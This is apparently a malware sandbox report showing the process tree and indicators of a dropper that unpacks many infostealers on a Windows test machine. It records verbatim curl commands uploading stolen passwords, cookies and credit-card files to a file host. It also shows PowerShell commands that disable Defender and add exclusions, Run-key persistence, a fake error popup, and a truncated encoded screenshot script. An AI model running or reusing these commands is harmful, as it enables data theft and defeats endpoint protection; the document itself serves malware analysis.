PID 4532 wrote to memory of 1884	4532	TPB-1.exe	112
PID 1708 wrote to memory of 2244	1708	x.exe	114
PID 1708 wrote to memory of 2244	1708	x.exe	114
PID 1884 wrote to memory of 2808	1884	cmd.exe	116
PID 1884 wrote to memory of 2808	1884	cmd.exe	116
PID 1884 wrote to memory of 2808	1884	cmd.exe	116
PID 1708 wrote to memory of 4704	1708	x.exe	117
PID 1708 wrote to memory of 4704	1708	x.exe	117
PID 1708 wrote to memory of 3172	1708	x.exe	119
PID 1708 wrote to memory of 3172	1708	x.exe	119
PID 4684 wrote to memory of 656	4684	PDFReader.exe	123
PID 4684 wrote to memory of 656	4684	PDFReader.exe	123
PID 4684 wrote to memory of 656	4684	PDFReader.exe	123
PID 4684 wrote to memory of 656	4684	PDFReader.exe	123
PID 4684 wrote to memory of 656	4684	PDFReader.exe	123
PID 4552 wrote to memory of 5484	4552	frnd1.exe	126
PID 4552 wrote to memory of 5484	4552	frnd1.exe	126
PID 4552 wrote to memory of 5484	4552	frnd1.exe	126
PID 4552 wrote to memory of 5756	4552	frnd1.exe	127
PID 4552 wrote to memory of 5756	4552	frnd1.exe	127
PID 4552 wrote to memory of 5756	4552	frnd1.exe	127
PID 4552 wrote to memory of 5756	4552	frnd1.exe	127
PID 4552 wrote to memory of 5756	4552	frnd1.exe	127
PID 4552 wrote to memory of 5756	4552	frnd1.exe	127

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
756	attrib.exe
5460	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	frnd.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	frnd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3488
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Users\Admin\AppData\Local\Temp\a\frnd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\frnd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3504
  - - C:\Users\Admin\AppData\Local\Temp\a\frnd.exe
      "C:\Users\Admin\AppData\Local\Temp\a\frnd.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:2976
- - C:\Users\Admin\AppData\Local\Temp\a\hellres.exe
    "C:\Users\Admin\AppData\Local\Temp\a\hellres.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- - C:\Users\Admin\AppData\Local\Temp\a\duschno.exe
    "C:\Users\Admin\AppData\Local\Temp\a\duschno.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2136
- - C:\Users\Admin\AppData\Local\Temp\a\resp.exe
    "C:\Users\Admin\AppData\Local\Temp\a\resp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4244
- - C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe"
      4⤵
      Executes dropped EXE
      PID:5484
  - - C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5756
- - C:\Users\Admin\AppData\Local\Temp\a\zx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\zx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1684
  - - C:\Users\Admin\AppData\Local\Temp\a\zx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\zx.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4836
- - C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4532
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe" & rd /s /q "C:\ProgramData\5PP8Q9ZUA1NY" & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2808
- - C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe
    "C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3168
- - C:\Users\Admin\AppData\Local\Temp\a\x.exe
    "C:\Users\Admin\AppData\Local\Temp\a\x.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\x.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3172
- - C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe
    "C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4684
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:656
- - C:\Users\Admin\AppData\Local\Temp\a\system32.exe
    "C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
    3⤵
    - Executes dropped EXE
    PID:5572
  - - C:\Users\Admin\AppData\Local\Temp\a\system32.exe
      "C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5304
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:4972
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:756
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5496
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
        5⤵
        
        PID:3572
      - C:\Windows\system32\reg.exe
        
        reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
        6⤵
        Modifies registry key
        
        PID:3712
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
        5⤵
        
        PID:4248
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2492
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:5380
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        
        PID:5772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:1300
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        
        PID:5652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:5780
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        
        PID:5940
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2040
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3660
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:232
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:928
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1872
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5092
- - C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5364
- - C:\Users\Admin\AppData\Local\Temp\a\Update.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1776
  - - C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe"
      4⤵
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      PID:5144
  - - C:\Windows\system32\audiodg.exe
      "C:\Windows\system32\audiodg.exe"
      4⤵
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      PID:5180
- - C:\Users\Admin\AppData\Local\Temp\a\main.exe
    "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
    3⤵
    - Executes dropped EXE
    PID:5432
  - - C:\Users\Admin\AppData\Local\Temp\a\main.exe
      "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
      4⤵
      Executes dropped EXE
      PID:6012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c
        5⤵
        
        PID:5824
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c
        5⤵
        
        PID:5908
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c
        5⤵
        
        PID:5892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35
        5⤵
        
        PID:5704
      - C:\Windows\system32\mode.com
        
        mode con: cols=125 lines=35
        6⤵
        
        PID:3984
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:6052
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get UUID
        5⤵
        
        PID:832
- - C:\Users\Admin\AppData\Local\Temp\a\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:6080
- - C:\Users\Admin\AppData\Local\Temp\a\shost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
    3⤵
    - Executes dropped EXE
    PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\a\shost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
      4⤵
      Executes dropped EXE
      PID:4856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
        5⤵
        
        PID:4868
      - C:\Windows\system32\taskkill.exe
        
        taskkill /im firefox.exe /t /f
        6⤵
        Kills process with taskkill
        
        PID:5960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:5616
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:2784
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:6012
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:5816
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:1544
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:5552
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:3496
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:1112
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:5244
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:5516
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:3548
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:2352
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:1624
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:5812
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupGet.dot" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:2580
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Documents/BackupGet.dot" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:5576
- - C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
    "C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
    3⤵
    - Executes dropped EXE
    PID:3180
  - - C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
      "C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
      4⤵
      Executes dropped EXE
      PID:4316
- - C:\Users\Admin\AppData\Local\Temp\a\phost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
    3⤵
    - Executes dropped EXE
    PID:5928
  - - C:\Users\Admin\AppData\Local\Temp\a\phost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
      4⤵
      Executes dropped EXE
      PID:516
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\phost.exe'"
        5⤵
        
        PID:3440
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\phost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:3420
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3984
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
        5⤵
        
        PID:828
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
        6⤵
        
        PID:6068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:1380
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5872
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:4940
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4396
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        5⤵
        
        PID:5252
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        6⤵
        
        PID:4852
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        5⤵
        
        PID:1716
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        6⤵
        
        PID:1508
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5424
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:3408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5212
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:1924
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
        5⤵
        
        PID:4488
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3736
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:3524
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5608
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:1480
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4572
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:3988
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:4024
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:2516
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:4328
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:1516
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5508
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2148
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2944
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:3116
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:6004
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        5⤵
        
        PID:5484
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        6⤵
        
        PID:5884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgA